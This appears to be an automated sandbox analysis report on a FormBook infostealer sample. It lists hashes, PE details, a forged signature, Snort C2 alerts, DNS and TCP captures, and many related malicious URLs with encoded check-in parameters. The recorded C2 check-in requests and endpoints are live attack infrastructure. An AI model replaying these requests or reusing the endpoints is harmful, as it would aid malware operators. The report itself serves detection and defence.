	vbc.exe	Get hash	malicious	Browse	www.hsvfingerprinting.com/b2c0/?yFN4sV7X=GBPyTIetQDYEnP95AB3ZP+TATXvEF0uNUplNLU+fJnXf4NL/NGXCk0UQ7SGq4zESqod4&x0Dp=d2MlYB4
	CpUNO6WMEm.exe	Get hash	malicious	Browse	www.hsvfingerprinting.com/b2c0/?m48dC6Y=GBPyTIetQDYEnP95AB3ZP+TATXvEF0uNUplNLU+fJnXf4NL/NGXCk0UQ7SGq4zESqod4&Z0Dd-=3fUd
	Order no.1480-G22-21202109.xlsx	Get hash	malicious	Browse	www.khadarelhodge.com/b6a4/?4hxTxl=ISFOGxfa/Eo0OrdimPhd2vjxQRkX0rrnM8iioAzdPJooWlLmYfY3DK/FaLFDpmXDEkf8tw==&Or=KZ7XHDep
	PAYMENT FX-DR-951.exe	Get hash	malicious	Browse	www.fusionirlifestyle.com/pvg1/?8po4=LYoIoJVZnrZujPLzR2o7iGOSe4k6pRT7FLdOZgNhgcsXvqUkW4+QNfYKTVTBok4J4Fdt&wT=8pZlU
	yIxjWxDphu.exe	Get hash	malicious	Browse	www.luvlauricephotography.com/n8ba/?htxTcr=aWNKG/tYXGQgDEyk4Vj0SXUYkQfuxKmtF2ByNRHtZNsTp13Mb0fk7deg6dKP0u+fyBij&ZVw8C0=e6AX5bQPWRst_Xu
	VoWfhUDRLM.exe	Get hash	malicious	Browse	www.mermaidtempestandfriends.net/att3/?mF=/OMaL1kIOyI8ugwqxVNuDzuAjVM0AccSHhbPyF2x9YTz17vIPVvsvVPChlrQQz9w6G6ERWG7Qw==&TBZ=6lSpMdW0jTSpdD
	Purchase Requirements.exe	Get hash	malicious	Browse	www.luvlauricephotography.com/n8ba/?U8L=aWNKG/tYXGQgDEyk4Vj0SXUYkQfuxKmtF2ByNRHtZNsTp13Mb0fk7deg6dKP0u+fyBij&oXTp_f=5joHJFap7tcH7lo
	Payment For Invoice 321-1005703.exe	Get hash	malicious	Browse	www.cosmicgeneralstore.com/fznn/?e0GHc8YP=Dj7UCWsvbv8DkfEq9tKgTvcupTdSugxbgzZlS3At0c1sHW8iosL710RgjoZPBOKtasId&9rg=00GTJt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
td-ccm-168-233.wixdns.net	zjWQY3wxxX.exe	Get hash	malicious	Browse	34.117.168.233
	PO-INQUIRY-VALE-SP-2022-60.exe	Get hash	malicious	Browse	34.117.168.233
	http://authcccu.com	Get hash	malicious	Browse	34.117.168.233
	http://onlinecccu.com	Get hash	malicious	Browse	34.117.168.233
	https://www.faxremittancereciept.com/	Get hash	malicious	Browse	34.117.168.233
	Commercial Invoice_xlsx.exe	Get hash	malicious	Browse	34.117.168.233
	Bill Of Lading-Original_xlsx.exe	Get hash	malicious	Browse	34.117.168.233
	http://www.microsmandate.net	Get hash	malicious	Browse	34.117.168.233
	Company Profile.exe	Get hash	malicious	Browse	34.117.168.233
	triage_dropped_file.exe	Get hash	malicious	Browse	34.117.168.233
	RFQ-Order List.exe	Get hash	malicious	Browse	34.117.168.233
	shipment documents for SST2112-250..exe	Get hash	malicious	Browse	34.117.168.233
	IFP_Instruction N. 1111.xlsx	Get hash	malicious	Browse	34.117.168.233
	http://www.wilcosite.org	Get hash	malicious	Browse	34.117.168.233
	dj.exe	Get hash	malicious	Browse	34.117.168.233
	https://www.minstroy.saratov.gov.ru/communication/blog/admin-blg/1.php?pagen=12	Get hash	malicious	Browse	34.117.168.233
	PO8765.exe	Get hash	malicious	Browse	34.117.168.233
	Statement of account.xlsx	Get hash	malicious	Browse	34.117.168.233
	Payment receipts - All due Invoices.xlsx	Get hash	malicious	Browse	34.117.168.233
	Payment receipts - All due Invoices.xlsx	Get hash	malicious	Browse	34.117.168.233
www.wallacehills.com	Pa5BQv8oni.exe	Get hash	malicious	Browse	52.54.92.195
	ntrebare ES220062.xlsx	Get hash	malicious	Browse	52.54.92.195
	8x6zeIBDXJ.exe	Get hash	malicious	Browse	52.54.92.195

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	https://u27056325.ct.sendgrid.net/ls/click?upn=7UtagSBiT7azDcajZ-2FyOJNin5sNxgGMtAZVhV7dGuoZTzrT0hZxmtRJXS4s8cD0hX61LsvDBJ8SdCjNMVSHTrWqNO948vyR5p-2B-2Fy5nCCM220ZA3SRBbQr0t4mjbPRX-2BBG-2BtHkNMum1PoMANUlx2QPSz4Br5G-2BACtsUwGbU25MUs-3DnSM7_m1-2B5T0y9KKTFwH14HcV3J5JdW-2FJdVu2O1gdB3ZnnnPm8Ee-2BcalrHBdJaezZx5z0v4RbQffWneAulpYtgcPs5wZ5KrxYvsv1nCOIL8yl1ZZ9d92ySFISVNqx7PGyD64NfHOFvV6Ejdm7vJWxkZImfYXHwObGgHdXIy6ksSnXJNZXCPLDeVkH7DRjAzvS2DlJzzZnLAWAAMO1hdMTwOqBpgvERi0esCdmbhUjTXbEiNzy3ZQYDivz5msibGoW7GJDH	Get hash	malicious	Browse	54.91.59.199
	net.WisdomStar.Ping.apk	Get hash	malicious	Browse	52.4.130.30
	DHL_29028263 documento de recibo de la compra,pdf,pdf.exe	Get hash	malicious	Browse	52.20.84.62
	Goodwill Encryptor.exe	Get hash	malicious	Browse	3.232.242.170
	Goodwill Encryptor.exe	Get hash	malicious	Browse	3.220.57.224
	PO-05218B.exe	Get hash	malicious	Browse	52.86.6.113
	SecuriteInfo.com.Linux.Mirai.4511.13906.28289	Get hash	malicious	Browse	34.204.5.222
	SecuriteInfo.com.Linux.Mirai.4514.1952.20875	Get hash	malicious	Browse	18.207.108.95
	ZHD43k8LJI	Get hash	malicious	Browse	54.22.37.208
	arm	Get hash	malicious	Browse	44.215.50.229
	m40jS299nD	Get hash	malicious	Browse	44.193.243.208
	h8Jfg7GziH	Get hash	malicious	Browse	3.218.204.3
	FINAL DOCS HBL & MBL.exe	Get hash	malicious	Browse	52.71.57.184
	KdlGKvIC3T	Get hash	malicious	Browse	44.198.89.78
	arm7	Get hash	malicious	Browse	52.0.173.34
	Our Food New Pricelist.js	Get hash	malicious	Browse	34.201.26.7
	wNsHQb6n2t	Get hash	malicious	Browse	54.23.64.160
	sora.arm	Get hash	malicious	Browse	54.28.188.104
	omiZor5tdG	Get hash	malicious	Browse	44.212.163.118
	https://pfa.levexis.com/clarks/tman.cgi?tmad=tmcampid%11&tmplaceref=iteo&tmclickref=tional2&tmloc=https://click.snapchat.com/aVHG?pid=chat_download_page&af_dp=http://20579.google.com&af_web_dp=http://adumpis.maboetours.co.za/?=adumpis@greendotcorp.com	Get hash	malicious	Browse	3.234.31.129
UNIFIEDLAYER-AS-1US	https://calcuttastreet.com/vqui/msnuoelvsttpaoi	Get hash	malicious	Browse	192.185.16.138
	00909888_xls.exe	Get hash	malicious	Browse	162.241.61.208
	SecuriteInfo.com.W32.AIDetectNet.01.21037.exe	Get hash	malicious	Browse	192.185.46.28
	bank details.exe	Get hash	malicious	Browse	50.87.178.69
	SecuriteInfo.com.W32.AIDetectNet.01.11188.exe	Get hash	malicious	Browse	192.185.96.179
	SecuriteInfo.com.X97M.DownLoader.1002.25583.xls	Get hash	malicious	Browse	162.214.98.126
	SecuriteInfo.com.X97M.DownLoader.1002.19760.xls	Get hash	malicious	Browse	162.214.98.126
	gC_2405.xls	Get hash	malicious	Browse	162.214.98.126
	2405.xls	Get hash	malicious	Browse	162.214.98.126
	INFO_239106214406.xls	Get hash	malicious	Browse	162.214.98.126
	DOCUMENTO 55.xls	Get hash	malicious	Browse	162.214.98.126
	Payment.exe	Get hash	malicious	Browse	50.87.178.69
	https://trackingcanada-ca.com/carenID/checkout/Calog	Get hash	malicious	Browse	162.241.62.126
	b07997fa6d97fa62edb47fe65881fb8fd7cfc025b1ac4.exe	Get hash	malicious	Browse	162.214.79.75
	SecuriteInfo.com.Trojan.MSIL.AgentTesla.ETH.MTB.11411.exe	Get hash	malicious	Browse	162.241.24.203
	https://www.faxremittancereciept.com/	Get hash	malicious	Browse	50.87.150.0
	Bill Of Lading-Original_xlsx.exe	Get hash	malicious	Browse	162.144.14.150
	http://dabnqueens.com	Get hash	malicious	Browse	69.49.247.96
	SX8KquYYog.xls	Get hash	malicious	Browse	162.214.98.126
	SecuriteInfo.com.XLM.Trojan.Abracadabra.8.Gen.5925.xls	Get hash	malicious	Browse	162.214.98.126

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jwRbEDUUZC.exe.log

Download File

Process:	C:\Users\user\Desktop\jwRbEDUUZC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.3467126928258955
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
MD5:	DD8B7A943A5D834CEEAB90A6BBBF4781
SHA1:	2BED8D47DF1C0FF76B40811E5F11298BD2D06389
SHA-256:	E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
SHA-512:	24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.4681914958604825
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jwRbEDUUZC.exe
File size:	599088
MD5:	f177fee6286dc51d2baf18d07c92d216
SHA1:	d87655521e74faaecb380fc8ac338ec5a00b048a
SHA256:	7a34ef3a5f0d2db6674d93de3143d2469d8fa06bf450dc4c1609c97822e68f53
SHA512:	6a654dc03b59552c2b3ad323572568d6da5878c48b296c7b3cd1697754e45530a1220d9619d1dde5dd6854df471e480741bb87d39bd7f794ebb3b9774ee070ab
SSDEEP:	12288:6JqiRxnR449Jk8boeVVWKUBmcFrw7HfIwRN71jdmESajnWjsFCk2b:6RoOD51jnSiSb
TLSH:	D9D4DB2938BA100DB272AE6C6BBC7175911EF7F226365C7B0CF7064A15129F0CB9D627
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..b................................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x491216
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x628AFE24 [Mon May 23 03:23:16 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Symantec Class 3 Extended Validation Code Signing CA - G2, OU=Symantec Trust Network, O=Symantec Corporation, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	5/9/2019 5:00:00 PM 5/22/2022 4:59:59 PM
Subject Chain	L=Bratislava, CN="ESET, spol. s r.o.", O="ESET, spol. s r.o.", L=Bratislava, C=SK, SERIALNUMBER=31 333 532, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SK
Version:	3
Thumbprint MD5:	F6D9CB76EC7473A587E7A4058E8377CC
Thumbprint SHA-1:	B59165451BE46B8D72D09191D0961C755D0107C8
Thumbprint SHA-256:	285799734B01DC7BE2566C6DD6C52CE79735F33159C472297CF0CA3830F70294
Serial:	65628C146ACE93037FC58659F14BD35F

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x911bc	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x5a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x8fe00	0x2630
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5988	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8f21c	0x8f400	False	0.35006953534	data	4.36875629646	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x92000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x5a8	0x600	False	0.418619791667	data	4.11724997828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x940a0	0x31c	data
RT_MANIFEST	0x943bc	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2022
Assembly Version	1.0.0.0
InternalName	REDDDGGDG.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	REDDDGGDG
ProductVersion	1.0.0.0
FileDescription	REDDDGGDG
OriginalFilename	REDDDGGDG.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6162.241.253.23149805802031449 05/25/22-11:47:01.632726	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.2.6	162.241.253.231
192.168.2.652.54.92.19549798802031449 05/25/22-11:46:40.318240	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49798	80	192.168.2.6	52.54.92.195
192.168.2.6162.241.253.23149805802031412 05/25/22-11:47:01.632726	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.2.6	162.241.253.231
192.168.2.652.54.92.19549798802031412 05/25/22-11:46:40.318240	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49798	80	192.168.2.6	52.54.92.195
192.168.2.6162.241.253.23149805802031453 05/25/22-11:47:01.632726	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49805	80	192.168.2.6	162.241.253.231
192.168.2.652.54.92.19549798802031453 05/25/22-11:46:40.318240	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49798	80	192.168.2.6	52.54.92.195

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2022 11:46:40.177556038 CEST	49798	80	192.168.2.6	52.54.92.195
May 25, 2022 11:46:40.317884922 CEST	80	49798	52.54.92.195	192.168.2.6
May 25, 2022 11:46:40.318058968 CEST	49798	80	192.168.2.6	52.54.92.195
May 25, 2022 11:46:40.318239927 CEST	49798	80	192.168.2.6	52.54.92.195
May 25, 2022 11:46:40.458136082 CEST	80	49798	52.54.92.195	192.168.2.6
May 25, 2022 11:46:40.458157063 CEST	80	49798	52.54.92.195	192.168.2.6
May 25, 2022 11:46:40.458342075 CEST	49798	80	192.168.2.6	52.54.92.195
May 25, 2022 11:46:40.458427906 CEST	49798	80	192.168.2.6	52.54.92.195
May 25, 2022 11:46:40.598462105 CEST	80	49798	52.54.92.195	192.168.2.6
May 25, 2022 11:46:45.544665098 CEST	49801	80	192.168.2.6	34.117.168.233
May 25, 2022 11:46:45.563381910 CEST	80	49801	34.117.168.233	192.168.2.6
May 25, 2022 11:46:45.563483953 CEST	49801	80	192.168.2.6	34.117.168.233
May 25, 2022 11:46:45.563656092 CEST	49801	80	192.168.2.6	34.117.168.233
May 25, 2022 11:46:45.582823038 CEST	80	49801	34.117.168.233	192.168.2.6
May 25, 2022 11:46:45.633441925 CEST	80	49801	34.117.168.233	192.168.2.6
May 25, 2022 11:46:45.633472919 CEST	80	49801	34.117.168.233	192.168.2.6
May 25, 2022 11:46:45.633610010 CEST	49801	80	192.168.2.6	34.117.168.233
May 25, 2022 11:46:45.633683920 CEST	49801	80	192.168.2.6	34.117.168.233
May 25, 2022 11:46:46.001372099 CEST	49801	80	192.168.2.6	34.117.168.233
May 25, 2022 11:46:46.021183968 CEST	80	49801	34.117.168.233	192.168.2.6
May 25, 2022 11:46:50.659984112 CEST	49802	80	192.168.2.6	34.102.136.180
May 25, 2022 11:46:50.678877115 CEST	80	49802	34.102.136.180	192.168.2.6
May 25, 2022 11:46:50.679941893 CEST	49802	80	192.168.2.6	34.102.136.180
May 25, 2022 11:46:50.680059910 CEST	49802	80	192.168.2.6	34.102.136.180
May 25, 2022 11:46:50.698872089 CEST	80	49802	34.102.136.180	192.168.2.6
May 25, 2022 11:46:50.798515081 CEST	80	49802	34.102.136.180	192.168.2.6
May 25, 2022 11:46:50.798603058 CEST	80	49802	34.102.136.180	192.168.2.6
May 25, 2022 11:46:50.798703909 CEST	49802	80	192.168.2.6	34.102.136.180
May 25, 2022 11:46:50.798858881 CEST	49802	80	192.168.2.6	34.102.136.180
May 25, 2022 11:46:50.817625999 CEST	80	49802	34.102.136.180	192.168.2.6
May 25, 2022 11:46:55.961683989 CEST	49804	80	192.168.2.6	192.185.0.218
May 25, 2022 11:46:56.098151922 CEST	80	49804	192.185.0.218	192.168.2.6
May 25, 2022 11:46:56.098284960 CEST	49804	80	192.168.2.6	192.185.0.218
May 25, 2022 11:46:56.098459959 CEST	49804	80	192.168.2.6	192.185.0.218
May 25, 2022 11:46:56.235495090 CEST	80	49804	192.185.0.218	192.168.2.6
May 25, 2022 11:46:56.235699892 CEST	80	49804	192.185.0.218	192.168.2.6
May 25, 2022 11:46:56.235733986 CEST	80	49804	192.185.0.218	192.168.2.6
May 25, 2022 11:46:56.235991955 CEST	49804	80	192.168.2.6	192.185.0.218
May 25, 2022 11:46:56.237163067 CEST	49804	80	192.168.2.6	192.185.0.218
May 25, 2022 11:46:56.373370886 CEST	80	49804	192.185.0.218	192.168.2.6
May 25, 2022 11:47:01.489557028 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.632355928 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.632584095 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.632725954 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.774889946 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900049925 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900129080 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900176048 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900222063 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900254965 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900269032 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.900300026 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.900304079 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900338888 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900377989 CEST	80	49805	162.241.253.231	192.168.2.6
May 25, 2022 11:47:01.900379896 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.900458097 CEST	49805	80	192.168.2.6	162.241.253.231
May 25, 2022 11:47:01.901595116 CEST	49805	80	192.168.2.6	162.241.253.231

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2022 11:46:29.787770033 CEST	52698	53	192.168.2.6	8.8.8.8
May 25, 2022 11:46:29.808147907 CEST	53	52698	8.8.8.8	192.168.2.6
May 25, 2022 11:46:39.987351894 CEST	53829	53	192.168.2.6	8.8.8.8
May 25, 2022 11:46:40.173733950 CEST	53	53829	8.8.8.8	192.168.2.6
May 25, 2022 11:46:45.511878014 CEST	58689	53	192.168.2.6	8.8.8.8
May 25, 2022 11:46:45.543533087 CEST	53	58689	8.8.8.8	192.168.2.6
May 25, 2022 11:46:50.641426086 CEST	50081	53	192.168.2.6	8.8.8.8
May 25, 2022 11:46:50.658690929 CEST	53	50081	8.8.8.8	192.168.2.6
May 25, 2022 11:46:55.813672066 CEST	65526	53	192.168.2.6	8.8.8.8
May 25, 2022 11:46:55.960406065 CEST	53	65526	8.8.8.8	192.168.2.6
May 25, 2022 11:47:01.319237947 CEST	53049	53	192.168.2.6	8.8.8.8
May 25, 2022 11:47:01.483450890 CEST	53	53049	8.8.8.8	192.168.2.6
May 25, 2022 11:47:11.938045979 CEST	61152	53	192.168.2.6	8.8.8.8
May 25, 2022 11:47:12.029840946 CEST	53	61152	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 25, 2022 11:46:29.787770033 CEST	192.168.2.6	8.8.8.8	0x844f	Standard query (0)	www.doxofcolor.com	A (IP address)	IN (0x0001)
May 25, 2022 11:46:39.987351894 CEST	192.168.2.6	8.8.8.8	0x4b81	Standard query (0)	www.wallacehills.com	A (IP address)	IN (0x0001)
May 25, 2022 11:46:45.511878014 CEST	192.168.2.6	8.8.8.8	0x8d52	Standard query (0)	www.attmleather.com	A (IP address)	IN (0x0001)
May 25, 2022 11:46:50.641426086 CEST	192.168.2.6	8.8.8.8	0xfa7c	Standard query (0)	www.nagpurmandarin.com	A (IP address)	IN (0x0001)
May 25, 2022 11:46:55.813672066 CEST	192.168.2.6	8.8.8.8	0x5bab	Standard query (0)	www.yonatec.com	A (IP address)	IN (0x0001)
May 25, 2022 11:47:01.319237947 CEST	192.168.2.6	8.8.8.8	0xc831	Standard query (0)	www.tubesing.com	A (IP address)	IN (0x0001)
May 25, 2022 11:47:11.938045979 CEST	192.168.2.6	8.8.8.8	0xc9a9	Standard query (0)	www.mentalnayaarifmetika.online	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 25, 2022 11:46:29.808147907 CEST	8.8.8.8	192.168.2.6	0x844f	Name error (3)	www.doxofcolor.com	none	none	A (IP address)	IN (0x0001)
May 25, 2022 11:46:40.173733950 CEST	8.8.8.8	192.168.2.6	0x4b81	No error (0)	www.wallacehills.com		52.54.92.195	A (IP address)	IN (0x0001)
May 25, 2022 11:46:45.543533087 CEST	8.8.8.8	192.168.2.6	0x8d52	No error (0)	www.attmleather.com	gcdn0.wixdns.net		CNAME (Canonical name)	IN (0x0001)
May 25, 2022 11:46:45.543533087 CEST	8.8.8.8	192.168.2.6	0x8d52	No error (0)	gcdn0.wixdns.net	td-ccm-168-233.wixdns.net		CNAME (Canonical name)	IN (0x0001)
May 25, 2022 11:46:45.543533087 CEST	8.8.8.8	192.168.2.6	0x8d52	No error (0)	td-ccm-168-233.wixdns.net		34.117.168.233	A (IP address)	IN (0x0001)
May 25, 2022 11:46:50.658690929 CEST	8.8.8.8	192.168.2.6	0xfa7c	No error (0)	www.nagpurmandarin.com	nagpurmandarin.com		CNAME (Canonical name)	IN (0x0001)
May 25, 2022 11:46:50.658690929 CEST	8.8.8.8	192.168.2.6	0xfa7c	No error (0)	nagpurmandarin.com		34.102.136.180	A (IP address)	IN (0x0001)
May 25, 2022 11:46:55.960406065 CEST	8.8.8.8	192.168.2.6	0x5bab	No error (0)	www.yonatec.com		192.185.0.218	A (IP address)	IN (0x0001)
May 25, 2022 11:47:01.483450890 CEST	8.8.8.8	192.168.2.6	0xc831	No error (0)	www.tubesing.com	tubesing.com		CNAME (Canonical name)	IN (0x0001)
May 25, 2022 11:47:01.483450890 CEST	8.8.8.8	192.168.2.6	0xc831	No error (0)	tubesing.com		162.241.253.231	A (IP address)	IN (0x0001)
May 25, 2022 11:47:12.029840946 CEST	8.8.8.8	192.168.2.6	0xc9a9	No error (0)	www.mentalnayaarifmetika.online		185.68.16.179	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.wallacehills.com

www.attmleather.com

www.nagpurmandarin.com

www.yonatec.com

www.tubesing.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49798	52.54.92.195	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 11:46:40.318239927 CEST	6334	OUT	GET /ocgr/?5jm=e/0Hm5WsGCZ9WAWS3m2jnNPZVvv73W2kM2wAvSWCn4dVzulK8Hz4WN5jVud3g/JTENNsBng/cw==&q48d=SN6PFzMPJRoDS HTTP/1.1 Host: www.wallacehills.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
